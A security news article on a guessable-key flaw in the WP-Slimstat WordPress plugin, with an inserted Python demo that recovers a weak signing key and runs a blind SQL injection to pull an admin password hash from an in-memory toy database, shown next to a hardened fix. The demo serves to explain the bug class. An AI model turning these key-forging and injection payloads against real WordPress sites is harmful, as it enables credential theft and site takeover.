Critical WordPress Analytics Plugin Vulnerability Affects 1.3 Million Websites


A critical vulnerability in a widely used WordPress analytics plugin leaves an estimated 1.3 million websites at risk of being compromised by attackers.

The vulnerability resides in most versions of the WordPress plugin WP-Slimstat. While more than 70 million websites on the Internet run WordPress, over 1.3 million of them use WP-Slimstat, making it one of the more popular WordPress plugins.

Versions prior to Slimstat 3.9.6 contain an easily guessable key that is used to sign data sent between the server and the client, according to a blog post published on Tuesday by web security firm Sucuri. The outcome is a SQL injection vector that can be used to extract highly sensitive data, including hashed passwords and, in some configurations, the WordPress secret keys, which can lead to a full site takeover.

Once the so-called secret key has been guessed, an attacker can forge validly signed requests and perform a blind SQL injection against the target website to pull sensitive information from the victim's database, including hashed passwords.

“If your website uses a vulnerable version of the plugin, you’re at risk,” said Marc-Alexandre Montpas, a senior vulnerability researcher at Sucuri.

He went on to say: “Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including usernames, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover).”

Technical details

It is possible to guess the secret key used to sign data sent to and from the client by looking at its value.
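The bug class described above, as an added, constructed example (Python rather than the plugin's PHP; this is not WP-Slimstat's code or Sucuri's proof of concept). It assumes, for illustration only, that the signing key is derived from a low-entropy value an attacker can narrow down (the MD5 of an install timestamp) and that the signed parameter is concatenated into a SQL query. The attacker recovers the key from a single captured signed request, forges signatures, and runs a boolean-based blind injection to read the admin password hash character by character; the hardened variant uses a random key and a parameterized query, so the same probe returns nothing.

```python
import hashlib
import hmac
import secrets
import sqlite3

# Constructed sample data: a fake password hash, not a real WordPress hash.
ADMIN_HASH = "$P$BExampleHash"


def derive_weak_key(install_ts: int) -> str:
    """ASSUMED weak derivation for the demo: key = md5(install timestamp)."""
    return hashlib.md5(str(install_ts).encode()).hexdigest()


def sign(key: str, payload: str) -> str:
    """Signature the client attaches to an analytics payload."""
    return hmac.new(key.encode(), payload.encode(), hashlib.sha256).hexdigest()


def verify(key: str, payload: str, sig: str) -> bool:
    return hmac.compare_digest(sign(key, payload), sig)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the WordPress database (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(user_login TEXT, user_pass TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", ADMIN_HASH))
    db.execute("CREATE TABLE visits(referer TEXT)")
    db.execute("INSERT INTO visits VALUES ('https://example.test/')")
    return db


class VulnerableTracker:
    """Guessable key + string-concatenated SQL (the pattern under discussion)."""

    def __init__(self, install_ts: int):
        self.key = derive_weak_key(install_ts)
        self.db = make_db()

    def count_referer(self, payload: str, sig: str):
        if not verify(self.key, payload, sig):
            return None  # signature check passes only if the key is known
        # Vulnerable: the signed payload is concatenated straight into SQL.
        row = self.db.execute(
            f"SELECT COUNT(*) FROM visits WHERE referer = '{payload}'").fetchone()
        return row[0]


class HardenedTracker:
    """Random 256-bit key and a parameterized query."""

    def __init__(self):
        self.key = secrets.token_hex(32)
        self.db = make_db()

    def count_referer(self, payload: str, sig: str):
        if not verify(self.key, payload, sig):
            return None
        row = self.db.execute(
            "SELECT COUNT(*) FROM visits WHERE referer = ?", (payload,)).fetchone()
        return row[0]


def recover_key(payload: str, sig: str, ts_low: int, ts_high: int):
    """Attacker: try every timestamp in a window against one captured request."""
    for ts in range(ts_low, ts_high):
        candidate = derive_weak_key(ts)
        if verify(candidate, payload, sig):
            return candidate
    return None


def blind_extract(tracker, key: str, max_len: int = 64) -> str:
    """Boolean-based blind SQLi: COUNT(*) > 0 answers one yes/no question."""
    charset = "$./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    out = ""
    for pos in range(1, max_len + 1):
        for c in charset:
            probe = (f"' OR (SELECT substr(user_pass,{pos},1) FROM users "
                     f"WHERE user_login='admin')='{c}' --")
            if tracker.count_referer(probe, sign(key, probe)):
                out += c
                break
        else:
            break  # no character matched: end of the hash
    return out


def demo(install_ts: int = 1420070400, window: int = 3600):
    victim = VulnerableTracker(install_ts)
    # The attacker observes one legitimate signed request from the tracking script.
    seen_payload = "https://example.test/"
    seen_sig = sign(victim.key, seen_payload)
    key = recover_key(seen_payload, seen_sig, install_ts - window, install_ts + window)
    leaked = blind_extract(victim, key) if key else ""
    hardened = HardenedTracker()
    probe = "' OR 1=1 --"
    safe = hardened.count_referer(probe, sign(hardened.key, probe))
    return key == victim.key, leaked, safe


if __name__ == "__main__":
    print(demo())
```

The point of the two fixes is that they are independent: a random key stops the forgery, and the parameterized query stops the injection even for a caller who legitimately holds the key.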

You can find full details of the attack on the Sucuri blog.

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]